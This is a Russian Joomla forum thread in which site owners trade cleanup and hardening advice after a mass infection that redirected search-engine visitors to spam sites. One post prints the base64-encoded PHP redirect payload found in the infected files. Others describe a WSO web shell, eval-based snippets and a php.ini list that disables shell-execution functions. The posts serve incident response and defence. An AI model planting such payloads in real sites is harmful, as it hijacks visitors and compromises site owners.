0 Пользователей и 1 Гость просматривают эту тему.
  • 51 Ответов
  • 31717 Просмотров
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Доброго времени, форумчане.

Столкнулся с проблемой: со всех входящих ссылок происходит переадресация. Т.е. если ввести в ПС адрес сайта, а потом перейти, он перекинет сперва на http://goooogle.osa.pl, а потом по своему усмотрению (казино или диета). Если вбить напрямую, откроет сайт без проблем.

На VPS'ке дебиан, крутится десяток сайтов, все на J 1.5. И на всех такая байда. htaccess чистый.

Для пробы закидывал чистый index.html, с ПС идет нормально. Дальше начал рыть в index.php:

После удаления 21-ой строчки
Код
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

с ПС переходит, хоть и ругается ошибками.

Дальше я пошел в файл includes/defines.php и снова нарыл строку, после удаления которой с ПС сайт открывает, но так же, с ошибками
Код
$parts = explode( DS, JPATH_BASE );

Куда дальше?  !
« Последнее редактирование: 06.11.2011, 00:54:52 от asdf27 »
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация
« Ответ #1 : 06.11.2011, 00:00:53 »
Разобрался... Жаль что никто не помог, сэкономил бы время.

Был вирус, который редиректил на поиск, после на нужный сайт.

1. В теле php файла плагина найден код
Код
("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhbmRleC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtYWlsLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ29vb29nbGUub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

Найти не сложно, у меня в 4000+ файлах был :) в самой шапке.

Далее, на сайте http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ раскодировал, увидел присутствие урла, на который редиректит сайт.

Ну и через Notepad++ поисках в файлах - замена. Только муторно теперь, 10+ сайтов на серваке и каждый надо скачать, почистить и залить обратно :)
*

fedos23

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #2 : 29.12.2011, 11:27:28 »
А через что хакнули? неизвестно?
У меня такая же байда...
*

nsfgh

  • Новичок
  • 8
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #3 : 29.12.2011, 17:33:09 »
Тоже самое сегодня случилось, просто восстановил из резервной копии. В логах техподдержка хостинга не разобралась.
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #4 : 05.01.2012, 14:14:31 »
А через что хакнули? неизвестно?
У меня такая же байда...

На многих папках 777 стояли права. Но больше думаю на забытый, не удаленный Total cmd с сохраненным паролем.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #5 : 07.01.2012, 07:15:13 »
аналогичная проблема, редирект из поисковых систем.
посмотрел сайт, посмотрел здоровые файлы, не пойму, зачем надо было удалять require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
эта строка идёт в стандарте.

в индексе удалил почти такой же код Base 64, всё равно редиректит, как и от куда, не пойму.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #6 : 07.01.2012, 07:16:08 »
хакнули скорее всего через FTP, total CMD.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #7 : 07.01.2012, 09:34:42 »
И вам переписали все файлы. Я так понял, это был акт новогоднего вандализма. Надо перезаливать и вычищать.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #8 : 07.01.2012, 15:44:40 »
а что перезалить?? поискал выборочно, не вижу больше нигде такого кода.
index я вычистил, не пойму, что сейчас срабатывает?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #9 : 07.01.2012, 15:57:42 »
делай бекап распаковывай но локалке и через поиск в  Total Commander  ищи

потом в php.ini выставь так
Код
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #10 : 07.01.2012, 16:47:20 »
Текст реплейсер и ищет и заменяет. Понравился очень.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #11 : 07.01.2012, 17:28:38 »
инфицируются в основном два файла, но местами больше

это defines.php и index.php
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #12 : 07.01.2012, 18:04:18 »
Это новогодняя вирусная атака. Почти 100% перегажены почти все файлы. Текст реплейсер найдет, какие именно :)
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #13 : 08.01.2012, 05:58:02 »
Пострадавшие, напишите на каком хосте.
Мои личне наблюдения, хакнули сайты только на хосте timeweb, остальные ресурсы не пострадали.
Вывод - это не тотал командер.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #14 : 08.01.2012, 10:48:54 »
Вполне возможно таймвеб хакнули?
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #15 : 08.01.2012, 17:10:54 »
У меня hc.ru . Для поиск хорошо подходит Notepad++.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #16 : 08.01.2012, 17:46:42 »
Ясно, значит не только timweb.
Но пришли со стороны хостера, сейчас логи буду изучать.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #17 : 10.01.2012, 17:46:29 »
атака продолжается, только я всё зачистил, поменял все пароли и явки, два дня, все сайты опять загажены, один пациент очень сильно, загажены все php файлы, в одном файле по 10 раз, это трындец.....

Кстати не всё на CMS Joomla.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #18 : 10.01.2012, 19:26:32 »
Разве что перенести сайты на другого хостера, разбить на несколько аккаунтов, перед этим сменить пароли администраторов, залить поверх базы данных (снести все файлы и залить свежие версии).
*

madal

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #19 : 10.01.2012, 20:02:05 »
Сегодня сносил тот же самый вирус. Написали скрипт который все файлы заменял. Найдено аж 106тыс зараженных файлов.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #21 : 11.01.2012, 11:40:01 »
такая же байда больше 60 сайтов с этой хренью, 95% Joomla от 1.5.17 до 1.5.25 и 1.7.3, wordpress точно так же взломан, еще 4 сайта не на нашем хостинге. сейчас восстанавливаюсь, но что предпринять для предотвращения инцидента?
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #22 : 11.01.2012, 11:42:00 »
как думаете есть ли смысл в отдел "К" обращаться?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Переадресация, Редирект, Вирус
« Ответ #23 : 11.01.2012, 12:12:18 »
отдел "К" обращаться должен замученный вами хостер, а не вы
а вам необходимо на столько его замучить, или просто всем съехать разом и негатив написать везде, тогда он зашевелиться быстрее ^-^
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #24 : 11.01.2012, 15:51:34 »
106к... Сколько же у вас сайт весит? :)
Вся проблема, как мне кажется, в правах на папки. Когда несколько доменов, аппач работает под одним юзверем, и сломав один домен, вирь легко пробирается в другие папки.

Всю ночь провозился со своим debian, но php как cgi так и не смог заставить работать. Видимо, придется менять хоста. Уже запарился чистить.
*

n55

  • Новичок
  • 4
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #25 : 12.01.2012, 18:32:39 »
У меня на Sweb также все сайта на Joomla заражены.
Причем на одном - всего два файлика, а на другом - ооочень много, больше сотни.


*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Переадресация, Редирект, Вирус
« Ответ #26 : 12.01.2012, 19:00:14 »
Да уж... и смотрю все на больших хостингах.
*

shapeout

  • Осваиваюсь на форуме
  • 18
  • 0 / 0
  • все что связано с велосипедами - www.veloarena.ru
Re: Переадресация, Редирект, Вирус
« Ответ #27 : 14.01.2012, 12:21:06 »
Всем привет.
У меня тоже до НГ сайты хакнули.
Как я понял у меня было 4 вируса.
один - это eval(base64_decode потом идёт куча всего, что зашифрованно. (в основном вирус который редиректор)
второй - это шелл, в моём случае WSO 2 лежал в components/com_search файл называется class.php Если его внимательно посмотреть, то можно заметить куски того "зашифрованного гамна" из которого собирается первый  вирус, но это моё предположение. Еще нашел один шелл, один-в-один как этот, тока лежал в папке mod_myblog_arhive, внутри шелла есть описание его и кем написан.
Код
  * WSO 2
 * Web Shell by oRb
третье - это в папке plugins лежит папка mod в которой есть архив (сам себя заархивированный) и собсно сам по себе вирус. Он, как я понял, занимается спапом. Я просто снёс папку и всё. Особо разбираться некогда было.
четвертое - это всем уже (наверное) известный редиректор. :) сам редиректор выглядит как
Код
if(preg_match('!MIDP|WAP|Windows.CE и далее куча-куча перечислений
и второй
Код
<script>b=new функция, потом всё в зашифрованном виде типа [b]-t+число[/b]куча-куча
и всё это расшифровывается eval( - собсно по этому выражению я и искал.
Искал я всё это безобразие фаром по тексту в файле. Муторная скажу я Вам работёнка, но уж лучше в ручную, чем чё нить важное потереть... Возможно, что всё мной рассказанное - это одно целое.
Как я боролся.
Первым делом в корень сайта кинул файл .ftpaccess - с содержанием
Код
<Limit ALL>
Allow from 127.0.0.1 // здесь IP разрешенному доступ
Deny from all // всем (остальным) запретить
ListOptions "+a" // скрыть все файлы начинающиеся с точки
</Limit>
Можно еще в Google порыть, найти еще настроек.
Начал искать по тексту вируса, в каких еще файлах встречается... На всякий пожарный делал копии, изучал и искал. Собсно всё.
Ща еще базу буду проверять, вдруг там тоже нагадили.

Вот теперь сижу и думаю, как базу подчистить? Я там стока интересного нашел... Никто случаем не знает?
« Последнее редактирование: 14.01.2012, 22:42:42 от shapeout »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #28 : 14.01.2012, 13:25:30 »
Вот htaccess от Nicholas K. Dionysopoulos ведущего разработчика AkeebaBackup.com
возможно кто то что то найдет для себя полезное

Спойлер
[свернуть]

Это своего рода шаблон который требует некоторых изменений
__________________________________________________________________________

Также что то можно использовать отсюда

Спойлер
[свернуть]

*

mamedovvs

  • Новичок
  • 7
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #29 : 24.01.2012, 18:03:31 »
Та же проблема все сайты на Joomla заражены. Очистил и удалил все ftp аккаунты и что, через день та же хрень все заражены. Написал скриптик на python если нужно могу выложить, для поиска и удаления строки eval. Но главная причина понять почему так происходит, может быть нужно права расставить правильные.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 424
Последний ответ 14.02.2024, 13:15:59
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 922
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 2953
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1756
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 976
Последний ответ 16.05.2021, 18:52:24
от alekcae